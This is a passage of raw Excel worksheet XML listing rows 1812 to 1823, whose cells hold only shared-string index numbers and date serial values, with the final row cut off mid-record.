    <row r="1812" s="1" customFormat="1" spans="1:47">
      <c r="A1812" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1812" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1812" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1812" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1812" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1812" s="23" t="s">
        <v>11375</v>
      </c>
      <c r="G1812" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1812" s="23"/>
      <c r="I1812" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1812" s="23"/>
      <c r="K1812" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1812" s="24">
        <v>45914.9871180556</v>
      </c>
      <c r="M1812" s="24">
        <v>45914.9871180556</v>
      </c>
      <c r="N1812" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1812" s="23" t="s">
        <v>11376</v>
      </c>
      <c r="P1812" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1812" s="23"/>
      <c r="R1812" s="23"/>
      <c r="S1812" s="23"/>
      <c r="T1812" s="23"/>
      <c r="U1812" s="23"/>
      <c r="V1812" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1812" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1812" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1812" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1812" s="24">
        <v>45914.9871180556</v>
      </c>
      <c r="AA1812" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1812" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1812" s="23"/>
      <c r="AD1812" s="23"/>
      <c r="AE1812" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1812" s="23"/>
      <c r="AG1812" s="25" t="s">
        <v>10468</v>
      </c>
      <c r="AH1812" s="24">
        <v>45914.9902546296</v>
      </c>
      <c r="AI1812" s="23"/>
      <c r="AJ1812" s="23"/>
      <c r="AK1812" s="23"/>
      <c r="AL1812" s="23"/>
      <c r="AM1812" s="23"/>
      <c r="AN1812" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1812" s="23"/>
      <c r="AP1812" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1812" s="24">
        <v>45915.0079513889</v>
      </c>
      <c r="AR1812" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1812" s="23"/>
      <c r="AT1812" s="23"/>
      <c r="AU1812" s="23"/>
    </row>
    <row r="1813" s="1" customFormat="1" spans="1:47">
      <c r="A1813" s="23" t="s">
        <v>8655</v>
      </c>
      <c r="B1813" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1813" s="23" t="s">
        <v>2715</v>
      </c>
      <c r="D1813" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1813" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1813" s="23" t="s">
        <v>11377</v>
      </c>
      <c r="G1813" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1813" s="23"/>
      <c r="I1813" s="23" t="s">
        <v>8657</v>
      </c>
      <c r="J1813" s="23"/>
      <c r="K1813" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1813" s="24">
        <v>45914.9831944444</v>
      </c>
      <c r="M1813" s="24">
        <v>45914.9831944444</v>
      </c>
      <c r="N1813" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1813" s="23" t="s">
        <v>11378</v>
      </c>
      <c r="P1813" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1813" s="23"/>
      <c r="R1813" s="23"/>
      <c r="S1813" s="23"/>
      <c r="T1813" s="23"/>
      <c r="U1813" s="23"/>
      <c r="V1813" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1813" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1813" s="23" t="s">
        <v>11379</v>
      </c>
      <c r="Y1813" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1813" s="24">
        <v>45914.9831944444</v>
      </c>
      <c r="AA1813" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1813" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1813" s="23"/>
      <c r="AD1813" s="23"/>
      <c r="AE1813" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1813" s="23"/>
      <c r="AG1813" s="25" t="s">
        <v>11380</v>
      </c>
      <c r="AH1813" s="24">
        <v>45915.3318865741</v>
      </c>
      <c r="AI1813" s="23"/>
      <c r="AJ1813" s="23"/>
      <c r="AK1813" s="23"/>
      <c r="AL1813" s="23"/>
      <c r="AM1813" s="23"/>
      <c r="AN1813" s="23" t="s">
        <v>11341</v>
      </c>
      <c r="AO1813" s="23"/>
      <c r="AP1813" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1813" s="24">
        <v>45915.0040277778</v>
      </c>
      <c r="AR1813" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1813" s="23"/>
      <c r="AT1813" s="23"/>
      <c r="AU1813" s="23"/>
    </row>
    <row r="1814" s="1" customFormat="1" spans="1:47">
      <c r="A1814" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1814" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1814" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1814" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1814" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1814" s="23" t="s">
        <v>11381</v>
      </c>
      <c r="G1814" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1814" s="23"/>
      <c r="I1814" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1814" s="23"/>
      <c r="K1814" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1814" s="24">
        <v>45914.9585416667</v>
      </c>
      <c r="M1814" s="24">
        <v>45914.9585416667</v>
      </c>
      <c r="N1814" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1814" s="23" t="s">
        <v>11382</v>
      </c>
      <c r="P1814" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1814" s="23"/>
      <c r="R1814" s="23"/>
      <c r="S1814" s="23"/>
      <c r="T1814" s="23"/>
      <c r="U1814" s="23"/>
      <c r="V1814" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1814" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1814" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1814" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1814" s="24">
        <v>45914.9585416667</v>
      </c>
      <c r="AA1814" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1814" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1814" s="23"/>
      <c r="AD1814" s="23"/>
      <c r="AE1814" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1814" s="23"/>
      <c r="AG1814" s="25" t="s">
        <v>11383</v>
      </c>
      <c r="AH1814" s="24">
        <v>45914.9610185185</v>
      </c>
      <c r="AI1814" s="23"/>
      <c r="AJ1814" s="23"/>
      <c r="AK1814" s="23"/>
      <c r="AL1814" s="23"/>
      <c r="AM1814" s="23"/>
      <c r="AN1814" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1814" s="23"/>
      <c r="AP1814" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1814" s="24">
        <v>45914.979375</v>
      </c>
      <c r="AR1814" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1814" s="23"/>
      <c r="AT1814" s="23"/>
      <c r="AU1814" s="23"/>
    </row>
    <row r="1815" s="1" customFormat="1" spans="1:47">
      <c r="A1815" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1815" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1815" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1815" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1815" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1815" s="23" t="s">
        <v>11384</v>
      </c>
      <c r="G1815" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1815" s="23"/>
      <c r="I1815" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1815" s="23"/>
      <c r="K1815" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1815" s="24">
        <v>45914.9568055556</v>
      </c>
      <c r="M1815" s="24">
        <v>45914.9568055556</v>
      </c>
      <c r="N1815" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1815" s="23" t="s">
        <v>11385</v>
      </c>
      <c r="P1815" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1815" s="23"/>
      <c r="R1815" s="23"/>
      <c r="S1815" s="23"/>
      <c r="T1815" s="23"/>
      <c r="U1815" s="23"/>
      <c r="V1815" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1815" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1815" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1815" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1815" s="24">
        <v>45914.9568055556</v>
      </c>
      <c r="AA1815" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1815" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1815" s="23"/>
      <c r="AD1815" s="23"/>
      <c r="AE1815" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1815" s="23"/>
      <c r="AG1815" s="25" t="s">
        <v>11386</v>
      </c>
      <c r="AH1815" s="24">
        <v>45914.9595023148</v>
      </c>
      <c r="AI1815" s="23"/>
      <c r="AJ1815" s="23"/>
      <c r="AK1815" s="23"/>
      <c r="AL1815" s="23"/>
      <c r="AM1815" s="23"/>
      <c r="AN1815" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1815" s="23"/>
      <c r="AP1815" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1815" s="24">
        <v>45914.9776388889</v>
      </c>
      <c r="AR1815" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1815" s="23"/>
      <c r="AT1815" s="23"/>
      <c r="AU1815" s="23"/>
    </row>
    <row r="1816" s="1" customFormat="1" spans="1:47">
      <c r="A1816" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1816" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1816" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1816" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1816" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1816" s="23" t="s">
        <v>11387</v>
      </c>
      <c r="G1816" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1816" s="23"/>
      <c r="I1816" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1816" s="23"/>
      <c r="K1816" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1816" s="24">
        <v>45914.9343634259</v>
      </c>
      <c r="M1816" s="24">
        <v>45914.9343634259</v>
      </c>
      <c r="N1816" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1816" s="23" t="s">
        <v>11388</v>
      </c>
      <c r="P1816" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1816" s="23"/>
      <c r="R1816" s="23"/>
      <c r="S1816" s="23"/>
      <c r="T1816" s="23"/>
      <c r="U1816" s="23"/>
      <c r="V1816" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1816" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1816" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1816" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1816" s="24">
        <v>45914.9343634259</v>
      </c>
      <c r="AA1816" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1816" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1816" s="23"/>
      <c r="AD1816" s="23"/>
      <c r="AE1816" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1816" s="23"/>
      <c r="AG1816" s="25" t="s">
        <v>11389</v>
      </c>
      <c r="AH1816" s="24">
        <v>45914.937037037</v>
      </c>
      <c r="AI1816" s="23"/>
      <c r="AJ1816" s="23"/>
      <c r="AK1816" s="23"/>
      <c r="AL1816" s="23"/>
      <c r="AM1816" s="23"/>
      <c r="AN1816" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1816" s="23"/>
      <c r="AP1816" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1816" s="24">
        <v>45914.9551967593</v>
      </c>
      <c r="AR1816" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1816" s="23"/>
      <c r="AT1816" s="23"/>
      <c r="AU1816" s="23"/>
    </row>
    <row r="1817" s="1" customFormat="1" spans="1:47">
      <c r="A1817" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1817" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1817" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1817" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1817" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1817" s="23" t="s">
        <v>11390</v>
      </c>
      <c r="G1817" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1817" s="23"/>
      <c r="I1817" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1817" s="23"/>
      <c r="K1817" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1817" s="24">
        <v>45914.93375</v>
      </c>
      <c r="M1817" s="24">
        <v>45914.93375</v>
      </c>
      <c r="N1817" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1817" s="23" t="s">
        <v>11391</v>
      </c>
      <c r="P1817" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1817" s="23"/>
      <c r="R1817" s="23"/>
      <c r="S1817" s="23"/>
      <c r="T1817" s="23"/>
      <c r="U1817" s="23"/>
      <c r="V1817" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1817" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1817" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1817" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1817" s="24">
        <v>45914.93375</v>
      </c>
      <c r="AA1817" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1817" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1817" s="23"/>
      <c r="AD1817" s="23"/>
      <c r="AE1817" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1817" s="23"/>
      <c r="AG1817" s="25" t="s">
        <v>11216</v>
      </c>
      <c r="AH1817" s="24">
        <v>45914.9371064815</v>
      </c>
      <c r="AI1817" s="23"/>
      <c r="AJ1817" s="23"/>
      <c r="AK1817" s="23"/>
      <c r="AL1817" s="23"/>
      <c r="AM1817" s="23"/>
      <c r="AN1817" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1817" s="23"/>
      <c r="AP1817" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1817" s="24">
        <v>45914.9545833333</v>
      </c>
      <c r="AR1817" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1817" s="23"/>
      <c r="AT1817" s="23"/>
      <c r="AU1817" s="23"/>
    </row>
    <row r="1818" s="1" customFormat="1" spans="1:47">
      <c r="A1818" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1818" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1818" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1818" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1818" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1818" s="23" t="s">
        <v>11392</v>
      </c>
      <c r="G1818" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1818" s="23"/>
      <c r="I1818" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1818" s="23"/>
      <c r="K1818" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1818" s="24">
        <v>45914.9335300926</v>
      </c>
      <c r="M1818" s="24">
        <v>45914.9335300926</v>
      </c>
      <c r="N1818" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1818" s="23" t="s">
        <v>11393</v>
      </c>
      <c r="P1818" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1818" s="23"/>
      <c r="R1818" s="23"/>
      <c r="S1818" s="23"/>
      <c r="T1818" s="23"/>
      <c r="U1818" s="23"/>
      <c r="V1818" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1818" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1818" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1818" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1818" s="24">
        <v>45914.9335300926</v>
      </c>
      <c r="AA1818" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1818" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1818" s="23"/>
      <c r="AD1818" s="23"/>
      <c r="AE1818" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1818" s="23"/>
      <c r="AG1818" s="25" t="s">
        <v>11394</v>
      </c>
      <c r="AH1818" s="24">
        <v>45914.9370601852</v>
      </c>
      <c r="AI1818" s="23"/>
      <c r="AJ1818" s="23"/>
      <c r="AK1818" s="23"/>
      <c r="AL1818" s="23"/>
      <c r="AM1818" s="23"/>
      <c r="AN1818" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1818" s="23"/>
      <c r="AP1818" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1818" s="24">
        <v>45914.9543634259</v>
      </c>
      <c r="AR1818" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1818" s="23"/>
      <c r="AT1818" s="23"/>
      <c r="AU1818" s="23"/>
    </row>
    <row r="1819" s="1" customFormat="1" spans="1:47">
      <c r="A1819" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1819" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1819" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1819" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1819" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1819" s="23" t="s">
        <v>11395</v>
      </c>
      <c r="G1819" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1819" s="23"/>
      <c r="I1819" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1819" s="23"/>
      <c r="K1819" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1819" s="24">
        <v>45914.9314583333</v>
      </c>
      <c r="M1819" s="24">
        <v>45914.9314583333</v>
      </c>
      <c r="N1819" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1819" s="23" t="s">
        <v>11396</v>
      </c>
      <c r="P1819" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1819" s="23"/>
      <c r="R1819" s="23"/>
      <c r="S1819" s="23"/>
      <c r="T1819" s="23"/>
      <c r="U1819" s="23"/>
      <c r="V1819" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1819" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1819" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1819" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1819" s="24">
        <v>45914.9314583333</v>
      </c>
      <c r="AA1819" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1819" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1819" s="23"/>
      <c r="AD1819" s="23"/>
      <c r="AE1819" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1819" s="23"/>
      <c r="AG1819" s="25" t="s">
        <v>11346</v>
      </c>
      <c r="AH1819" s="24">
        <v>45914.9339699074</v>
      </c>
      <c r="AI1819" s="23"/>
      <c r="AJ1819" s="23"/>
      <c r="AK1819" s="23"/>
      <c r="AL1819" s="23"/>
      <c r="AM1819" s="23"/>
      <c r="AN1819" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1819" s="23"/>
      <c r="AP1819" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1819" s="24">
        <v>45914.9522916667</v>
      </c>
      <c r="AR1819" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1819" s="23"/>
      <c r="AT1819" s="23"/>
      <c r="AU1819" s="23"/>
    </row>
    <row r="1820" s="1" customFormat="1" spans="1:47">
      <c r="A1820" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1820" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1820" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1820" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1820" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1820" s="23" t="s">
        <v>11397</v>
      </c>
      <c r="G1820" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1820" s="23"/>
      <c r="I1820" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1820" s="23"/>
      <c r="K1820" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1820" s="24">
        <v>45914.9312037037</v>
      </c>
      <c r="M1820" s="24">
        <v>45914.9312037037</v>
      </c>
      <c r="N1820" s="23" t="s">
        <v>8663</v>
      </c>
      <c r="O1820" s="23" t="s">
        <v>11398</v>
      </c>
      <c r="P1820" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1820" s="23"/>
      <c r="R1820" s="23"/>
      <c r="S1820" s="23"/>
      <c r="T1820" s="23"/>
      <c r="U1820" s="23"/>
      <c r="V1820" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1820" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1820" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1820" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1820" s="24">
        <v>45914.9312037037</v>
      </c>
      <c r="AA1820" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1820" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1820" s="23"/>
      <c r="AD1820" s="23"/>
      <c r="AE1820" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1820" s="23"/>
      <c r="AG1820" s="25" t="s">
        <v>11399</v>
      </c>
      <c r="AH1820" s="24">
        <v>45914.9339467593</v>
      </c>
      <c r="AI1820" s="23"/>
      <c r="AJ1820" s="23"/>
      <c r="AK1820" s="23"/>
      <c r="AL1820" s="23"/>
      <c r="AM1820" s="23"/>
      <c r="AN1820" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1820" s="23"/>
      <c r="AP1820" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1820" s="24">
        <v>45914.952037037</v>
      </c>
      <c r="AR1820" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1820" s="23"/>
      <c r="AT1820" s="23"/>
      <c r="AU1820" s="23"/>
    </row>
    <row r="1821" s="1" customFormat="1" spans="1:47">
      <c r="A1821" s="23" t="s">
        <v>10007</v>
      </c>
      <c r="B1821" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1821" s="23" t="s">
        <v>11400</v>
      </c>
      <c r="D1821" s="23" t="s">
        <v>8695</v>
      </c>
      <c r="E1821" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1821" s="23" t="s">
        <v>11401</v>
      </c>
      <c r="G1821" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1821" s="23"/>
      <c r="I1821" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J1821" s="23" t="s">
        <v>10009</v>
      </c>
      <c r="K1821" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1821" s="24">
        <v>45913.3794560185</v>
      </c>
      <c r="M1821" s="24">
        <v>45913.3798148148</v>
      </c>
      <c r="N1821" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1821" s="23" t="s">
        <v>11402</v>
      </c>
      <c r="P1821" s="23" t="s">
        <v>8481</v>
      </c>
      <c r="Q1821" s="23"/>
      <c r="R1821" s="23" t="s">
        <v>11400</v>
      </c>
      <c r="S1821" s="23" t="s">
        <v>11403</v>
      </c>
      <c r="T1821" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1821" s="23" t="s">
        <v>8799</v>
      </c>
      <c r="V1821" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W1821" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1821" s="23" t="s">
        <v>8658</v>
      </c>
      <c r="Y1821" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1821" s="24">
        <v>45913.3808564815</v>
      </c>
      <c r="AA1821" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1821" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1821" s="23"/>
      <c r="AD1821" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE1821" s="23" t="s">
        <v>8500</v>
      </c>
      <c r="AF1821" s="23"/>
      <c r="AG1821" s="25" t="s">
        <v>8475</v>
      </c>
      <c r="AH1821" s="24">
        <v>45913.3809027778</v>
      </c>
      <c r="AI1821" s="23"/>
      <c r="AJ1821" s="23"/>
      <c r="AK1821" s="23" t="s">
        <v>11404</v>
      </c>
      <c r="AL1821" s="23" t="s">
        <v>4246</v>
      </c>
      <c r="AM1821" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1821" s="23"/>
      <c r="AO1821" s="23"/>
      <c r="AP1821" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1821" s="24">
        <v>45913.3912731481</v>
      </c>
      <c r="AR1821" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1821" s="23"/>
      <c r="AT1821" s="23"/>
      <c r="AU1821" s="23"/>
    </row>
    <row r="1822" s="1" customFormat="1" spans="1:47">
      <c r="A1822" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1822" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1822" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1822" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1822" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1822" s="23" t="s">
        <v>11405</v>
      </c>
      <c r="G1822" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1822" s="23"/>
      <c r="I1822" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1822" s="23"/>
      <c r="K1822" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1822" s="24">
        <v>45912.9855671296</v>
      </c>
      <c r="M1822" s="24">
        <v>45912.9855671296</v>
      </c>
      <c r="N1822" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1822" s="23" t="s">
        <v>11406</v>
      </c>
      <c r="P1822" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1822" s="23"/>
      <c r="R1822" s="23"/>
      <c r="S1822" s="23"/>
      <c r="T1822" s="23"/>
      <c r="U1822" s="23"/>
      <c r="V1822" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1822" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1822" s="23" t="s">
        <v>8553</v>
      </c>
      <c r="Y1822" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1822" s="24">
        <v>45912.9855671296</v>
      </c>
      <c r="AA1822" s="23" t="s">
        <v>8407</v>
      </c>
      <c r="AB1822" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1822" s="23"/>
      <c r="AD1822" s="23"/>
      <c r="AE1822" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="AF1822" s="23"/>
      <c r="AG1822" s="25" t="s">
        <v>11394</v>
      </c>
      <c r="AH1822" s="24">
        <v>45912.9890972222</v>
      </c>
      <c r="AI1822" s="23"/>
      <c r="AJ1822" s="23"/>
      <c r="AK1822" s="23"/>
      <c r="AL1822" s="23"/>
      <c r="AM1822" s="23"/>
      <c r="AN1822" s="23" t="s">
        <v>10387</v>
      </c>
      <c r="AO1822" s="23"/>
      <c r="AP1822" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1822" s="24">
        <v>45913.006400463</v>
      </c>
      <c r="AR1822" s="23" t="s">
        <v>8550</v>
      </c>
      <c r="AS1822" s="23"/>
      <c r="AT1822" s="23"/>
      <c r="AU1822" s="23"/>
    </row>
    <row r="1823" s="1" customFormat="1" spans="1:47">
      <c r="A1823" s="23" t="s">
        <v>8626</v>
      </c>
      <c r="B1823" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="C1823" s="23" t="s">
        <v>8551</v>
      </c>
      <c r="D1823" s="23" t="s">
        <v>8545</v>
      </c>
      <c r="E1823" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1823" s="23" t="s">
        <v>11407</v>
      </c>
      <c r="G1823" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1823" s="23"/>
      <c r="I1823" s="23" t="s">
        <v>8628</v>
      </c>
      <c r="J1823" s="23"/>
      <c r="K1823" s="23" t="s">
        <v>8548</v>
      </c>
      <c r="L1823" s="24">
        <v>45912.9821990741</v>
      </c>
      <c r="M1823" s="24">
        <v>45912.9821990741</v>
      </c>
      <c r="N1823" s="23" t="s">
        <v>8710</v>
      </c>
      <c r="O1823" s="23" t="s">
        <v>11408</v>
      </c>
      <c r="P1823" s="23" t="s">
        <v>8432</v>
      </c>
      <c r="Q1823" s="23"/>
      <c r="R1823" s="23"/>
      <c r="S1823" s="23"/>
      <c r="T1823" s="23"/>
      <c r="U1823" s="23"/>
      <c r="V1823" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1823" s="23" t="s">
        <v>8460</v>
      </c>
